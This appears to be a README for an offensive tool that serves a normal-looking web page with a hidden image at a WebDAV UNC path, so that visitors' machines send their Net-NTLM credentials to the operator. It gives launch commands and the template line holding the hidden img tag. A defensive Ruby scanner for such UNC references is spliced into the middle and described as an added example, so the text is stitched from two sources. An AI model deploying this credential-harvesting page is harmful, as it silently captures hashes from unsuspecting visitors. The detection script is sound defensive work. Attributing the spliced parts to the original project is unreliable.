audibleblink/davil

theDAVil

Host a website with an image at a UNC path and get creds. Bypasses Intranet Zones and forces auth over the Internet.

Note: discovered later that this only works on virtualized hosts that use hypervisor-defined networking, which resolves integerized IP addresses via DNS to a normal IP. Having such a hypervisor bypasses the Intranet Zones restriction on automatic authentication, so no user interaction is needed.

A normal looking web page

Behind the Scenes

Usage

With Docker

./theDAVil.sh 192.168.99.101 443

With Just Ruby

# If you already have a ruby dev env
bundle
ruby server.rb 192.168.99.101 443


# Else
apt install rbenv ruby-build
rbenv install 3.0.0
eval "$(rbenv init -)"

bundle install
bundle exec ruby server.rb 192.168.99.101 443

Customization

Replace the views/index.erb with your content. Make sure you keep the template line that looks like this:

<img src="<%= "\\\\#{@host}@#{@port}\\logo.png" %>" style="display: none" />
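For the defending side, the template line above is also the thing to look for: a `src` or `href` holding a UNC path in the `\\host@port\...` WebDAV form, possibly with the host written as a single integer. The scanner below is an added example, not code from this repository; `find_unc_references`, `UNC_RE` and the sample HTML are constructed for illustration.

```ruby
require "ipaddr"

# \\host[@SSL][@port]\rest ; the "@..." suffix is the WebDAV form of a UNC path
UNC_RE = /\\\\([^\\\/@\s"'<>]+)((?:@[A-Za-z0-9]+)*)\\/

# Constructed sample page (not taken from the repository).
SAMPLE_HTML = <<~'HTML'
  <html><body>
    <img src="/static/banner.png" />
    <img src="\\3232260965@443\logo.png" style="display: none" />
    <a href="\\fileserver\share\doc.txt">doc</a>
  </body></html>
HTML

# Return one finding per UNC reference in src/href attributes of +html+.
def find_unc_references(html)
  findings = []
  html.scan(/\b(?:src|href)\s*=\s*(["'])(.*?)\1/im) do |_quote, value|
    m = UNC_RE.match(value)
    next unless m
    host = m[1]
    parts = m[2].split("@").reject(&:empty?)
    port = parts.find { |p| p.match?(/\A\d+\z/) }
    decoded = nil
    # A host made only of digits is an IPv4 address written as one integer.
    if host.match?(/\A\d+\z/) && host.to_i <= 0xFFFFFFFF
      decoded = IPAddr.new(host.to_i, Socket::AF_INET).to_s
    end
    findings << {
      host: host,
      webdav: !parts.empty?,   # "@port"/"@SSL" means HTTP(S) WebDAV, not SMB
      ssl: parts.any? { |p| p.casecmp?("ssl") },
      port: port&.to_i,
      decoded_ip: decoded
    }
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  find_unc_references(SAMPLE_HTML).each { |f| puts f.inspect }
end
```

A finding with `webdav: true` or a non-nil `decoded_ip` in content fetched from outside the network is worth an alert in a proxy or mail gateway rule.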

About

leaking net-ntlm with webdav
